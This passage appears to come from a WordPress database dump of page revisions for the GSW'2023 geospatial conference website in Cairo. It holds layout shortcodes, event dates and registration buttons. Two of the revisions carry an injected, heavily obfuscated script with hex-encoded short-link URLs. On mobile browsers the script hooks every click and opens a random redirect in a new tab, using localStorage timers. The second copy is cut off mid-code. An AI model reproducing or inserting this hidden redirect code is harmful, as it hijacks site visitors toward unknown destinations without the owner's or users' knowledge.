el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:06:31','2022-11-09 19:06:31','',3066,'https://gsw2023.com/?p=3200',0,'revision','',0),
(3201,1,'2022-11-09 19:07:25','2022-11-09 19:07:25','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n&nbsp;\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 